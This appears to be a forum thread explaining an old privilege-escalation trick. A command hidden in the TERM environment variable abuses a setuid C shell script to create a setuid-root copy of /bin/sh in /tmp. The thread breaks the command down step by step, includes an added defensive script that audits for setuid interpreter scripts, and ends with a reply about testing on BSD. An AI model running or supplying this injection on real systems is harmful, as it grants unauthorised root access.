And talking about the SUID (and GUID?) bit would take a whole thread in and of itself...
Ok, in my above post, I never really explained what this little hack actually does. So here's the explanation:

Quote:
    env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755 /tmp/sh`' change-pass

    What in the world does this command mean? It would be great if someone could break down each little thing, like for example the '` part, just decrypt the whole line to layman's terms please, thanks!

If we had a setuid script called change-pass with the source code:

Code:
#!/bin/csh -b
set user = $1
passwd $user

It could be exploited with the line:

Code:
env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755 /tmp/sh`' change-pass
This is because C shell scripts are vulnerable to environment variable "exploits". The TERM environment variable tells the application/script that is about to be run what type of console the user is using (usually xterm or vt100). This variable is passed to all subshells of the user's shell.
The `` quotes are commonly used in scripting languages to execute system commands. For example:

Code:
$ls = `ls`;

would store the listing of the current directory in the variable $ls.
The '' quotes just let you set an environment variable to a string that contains spaces. If you don't use the single quotes, the environment variable will get "chopped off" after the first space.
So the above line will actually execute the system command:
Code:
cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755 /tmp/sh
This is actually several *nix commands put on the same line. A semicolon acts like a newline character. So what we're actually doing is the commands:
Code:
cp /bin/sh /tmp/sh      # copies the sh binary to /tmp
chown root /tmp/sh      # changes the owner of the /tmp/sh binary to root
chmod 4755 /tmp/sh      # sets the /tmp/sh binary's permissions to executable + setuid
Then we run the passwd command via the dodgy C shell script. Because we don't give $1 a value, passwd defaults to superuser. You should now be prompted to change the root password. Bingo, the box has been owned.
Note: This exploit also assumes that the user has full access to chown and chmod.
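A defender-side check for the class of file this post describes, added here as an example and not part of the original thread: it walks a directory for setuid/setgid files and flags the ones that are interpreter scripts (they start with a shebang line), since those are the ones exposed to the environment-variable problem explained above. The directory argument and any sample files are assumptions.

```shell
#!/bin/sh
# Added example (not from the original thread): audit a tree for setuid/setgid
# files and separate interpreter scripts from compiled binaries. A setuid csh
# script like change-pass above is the thing an admin wants to find and strip
# the bit from (chmod u-s,g-s) or replace with a proper compiled wrapper.

# find_setuid_scripts DIR
#   Prints one line per setuid/setgid regular file under DIR:
#   "script:PATH" if the file begins with "#!", otherwise "binary:PATH".
find_setuid_scripts() {
    dir="$1"
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        # First two bytes decide whether the kernel would hand this file
        # to an interpreter (and thus to the caller's environment).
        magic=$(head -c 2 "$f" 2>/dev/null)
        if [ "$magic" = "#!" ]; then
            printf 'script:%s\n' "$f"
        else
            printf 'binary:%s\n' "$f"
        fi
    done
}

# count_setuid_scripts DIR
#   Number of setuid/setgid interpreter scripts under DIR (0 when clean).
count_setuid_scripts() {
    find_setuid_scripts "$1" | awk '/^script:/ { n++ } END { print n + 0 }'
}

# Stand-alone usage: audit the directory given on the command line,
# or /usr/local/bin when none is given (assumed location, adjust as needed).
if [ "${1:-}" != "" ] || [ -d /usr/local/bin ]; then
    target="${1:-/usr/local/bin}"
    find_setuid_scripts "$target"
    echo "setuid/setgid scripts found: $(count_setuid_scripts "$target")"
fi
```

Run it against the directories that hold locally installed tools; any "script:" line is a file that should not carry the setuid or setgid bit.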
Thx Terr,
for the link... That was educational. As simple as it (now) seems to be, I never would have thought of it... I tried slight variations of this on my BSD box and the system wouldn't let me use the chown or chmod for files that my "testdummy" logon had no business changing, so I'm cool... for now NEway...
It is kind of freaky that SUID shell scripts can be used to change passwd like that (or any other file for that matter)... Definitely something to be aware of.
Peace
Rev